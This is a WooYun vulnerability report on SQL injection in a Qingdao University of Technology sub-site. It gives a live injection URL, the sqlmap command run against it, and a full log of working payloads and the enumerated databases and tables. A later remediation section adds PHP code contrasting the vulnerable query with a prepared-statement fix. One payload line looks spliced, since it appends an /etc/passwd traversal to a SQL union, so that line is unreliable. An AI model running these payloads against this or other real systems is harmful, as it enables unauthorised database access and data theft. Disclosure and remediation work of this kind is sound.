
Vulnerability Summary

Defect ID: wooyun-2015-0110542

Title: SQL injection in a Qingdao University of Technology sub-site

Affected vendor: Qingdao University of Technology (青岛理工大学)

Author: 漩涡鸣人

Submitted: 2015-05-06 17:47

Fixed: 2015-05-11 17:48

Published: 2015-05-11 17:48

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 14

Status: Handed over to a third-party partner organisation (CCERT, the CERNET emergency response team) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability Details

Disclosure status:

2015-05-06: Details sent to the vendor, awaiting vendor response
2015-05-11: Vendor chose to ignore the vulnerability; details disclosed to the public

Brief description:

A sub-site of Qingdao University of Technology has a SQL injection vulnerability.

Detailed description:

The SQL injection vulnerability can lead to data leakage.

Proof of concept:

Injection point: http://swsj.qtech.edu.cn/middleacc/director.php?id=91
Proof:
sqlmap -u "http://swsj.qtech.edu.cn/middleacc/director.php?id=91" --tables
[*] starting at 20:18:48
[20:18:48] [DEBUG] cleaning up configuration parameters
[20:18:48] [DEBUG] setting the HTTP timeout
[20:18:48] [DEBUG] creating HTTP requests opener object
[20:18:48] [INFO] resuming back-end DBMS 'mysql'
[20:18:48] [DEBUG] resolving hostname 'swsj.qtech.edu.cn'
[20:18:48] [INFO] testing connection to the target URL
[20:18:49] [DEBUG] declared web page charset 'utf-8'
[20:18:49] [DEBUG] heuristically checking if the target is protected by some kind of WAF/IPS/IDS
[20:18:49] [PAYLOAD] QMWv=3481 AND 1=1 UNION ALL SELECT 1,2,3,table_name FROM information_schema.tables WHERE 2>1-- ../../../etc/passwd
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=91 AND 8197=8197
Vector: AND [INFERENCE]
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=91 AND (SELECT 4883 FROM(SELECT COUNT(*),CONCAT(0x717a767a71,(SELECT (CASE WHEN (4883=4883) THEN 1 ELSE 0 END)),0x7178717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (SELECT)
Payload: id=91 AND (SELECT * FROM (SELECT(SLEEP(5)))CewI)
Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
---
[20:18:49] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.2.5, Apache 2.2.6
back-end DBMS: MySQL 5.0
[20:18:49] [INFO] fetching database names
[20:18:49] [INFO] the SQL query used returns 5 entries
[20:18:49] [INFO] resumed: information_schema
[20:18:49] [INFO] resumed: lgdx
[20:18:49] [INFO] resumed: mysql
[20:18:49] [INFO] resumed: phpmyadmin
[20:18:49] [INFO] resumed: test
[20:18:49] [DEBUG] performed 0 queries in 0.01 seconds
[20:18:49] [INFO] fetching tables for databases: 'information_schema, lgdx, mysql, phpmyadmin, test'
[20:18:49] [INFO] the SQL query used returns 85 entries
[20:18:49] [DEBUG] suppressing possible resume console info because of large number of rows. It might take too long
[20:18:49] [DEBUG] performed 0 queries in 0.02 seconds
Database: test
[1 table]
+---------------------------------------+
| te |
+---------------------------------------+
Database: phpmyadmin
[7 tables]
+---------------------------------------+
| pma_bookmark |
| pma_column_info |
| pma_history |
| pma_pdf_pages |
| pma_relation |
| pma_table_coords |
| pma_table_info |
+---------------------------------------+
Database: lgdx
[43 tables]
+---------------------------------------+
| accinfor_admin_info |
| accinfor_keys |
| accinfor_message |
| accinfor_news |
| accinfor_news_pic |
| accinfor_ppt |
| accinfor_sort |
| auditing_admin_info |
| auditing_keys |
| auditing_message |
| auditing_news |
| auditing_news_pic |
| auditing_ppt |
| auditing_sort |
| lgdx_admin_info |
| lgdx_keys |
| lgdx_links |
| lgdx_message |
| lgdx_news |
| lgdx_news_pic |
| lgdx_ppt |
| lgdx_sort |
| middleacc_admin_info |
| middleacc_keys |
| middleacc_message |
| middleacc_news |
| middleacc_news_pic |
| middleacc_ppt |
| middleacc_sort |
| middleman_admin_info |
| middleman_keys |
| middleman_message |
| middleman_news |
| middleman_news_pic |
| middleman_ppt |
| middleman_sort |
| senioracc_admin_info |
| senioracc_keys |
| senioracc_message |
| senioracc_news |
| senioracc_news_pic |
| senioracc_ppt |
| senioracc_sort |
+---------------------------------------+
Database: information_schema
[17 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| KEY_COLUMN_USAGE |
| PROFILING |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| STATISTICS |
| TABLES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+
Database: mysql
[17 tables]
+---------------------------------------+
| user |
| columns_priv |
| db |
| func |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| host |
| proc |
| procs_priv |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
+---------------------------------------+
[20:18:49] [INFO] fetched data logged to text files under '/root/.sqlmap/output/swsj.qtech.edu.cn'
[*] shutting down at 20:18:49

Remediation:

Filter the input.
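The one-word fix above does not say how to do it. As an added example (not the site's own code, which the report does not include), here is a hypothetical handler for director.php in its vulnerable form beside a hardened form; it assumes a mysqli connection $db and a table middleacc_news (named in the sqlmap output above) with assumed columns id, title and body.

```php
<?php
// Added example, not the site's actual director.php (the report does not include it).
// Assumptions: a mysqli connection $db; a table middleacc_news (named in the sqlmap
// output above) with columns id, title, body (the column names are assumed).

// Vulnerable pattern: the raw GET value is spliced into the SQL text, so a request
// such as id=91 AND 8197=8197 (the boolean-based payload sqlmap reported) is run
// as SQL and the client controls the structure of the query.
function director_vulnerable(mysqli $db, array $get)
{
    $id  = $get['id'];
    $sql = "SELECT id, title, body FROM middleacc_news WHERE id = $id";
    // If the DB error text is echoed to the page on failure, the error-based
    // technique listed in the sqlmap output can read data from it.
    return $db->query($sql);
}

// Hardened pattern: validate the type first, then bind the value in a prepared
// statement. Bound parameters travel separately from the query text, so no value
// can change what the query does.
function director_fixed(mysqli $db, array $get)
{
    // A record id can only be a positive integer; reject everything else up front.
    $opts = array('options' => array('min_range' => 1));
    if (!isset($get['id']) || filter_var($get['id'], FILTER_VALIDATE_INT, $opts) === false) {
        header('HTTP/1.0 400 Bad Request');
        return null;
    }
    $id = (int) $get['id'];

    $stmt = $db->prepare('SELECT id, title, body FROM middleacc_news WHERE id = ?');
    if ($stmt === false) {
        // Log server-side only; never send $db->error to the client.
        error_log('prepare failed: ' . $db->error);
        header('HTTP/1.0 500 Internal Server Error');
        return null;
    }
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $stmt->bind_result($rid, $title, $body);
    $row = $stmt->fetch() ? array('id' => $rid, 'title' => $title, 'body' => $body) : null;
    $stmt->close();
    return $row;
}

// Typical call site for the hardened handler:
// $row = director_fixed($db, $_GET);
```

The integer check alone already rejects all three payload types sqlmap reported (boolean, error and time-based); the prepared statement is the defence that remains correct even if the parameter later needs to accept strings.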

Copyright notice: when reposting, credit the source: 漩涡鸣人@乌云


Vendor Response

Vendor response:

Severity: No impact, vendor ignored

Ignored on: 2015-05-11 17:48

Vendor reply:

Latest status:

None yet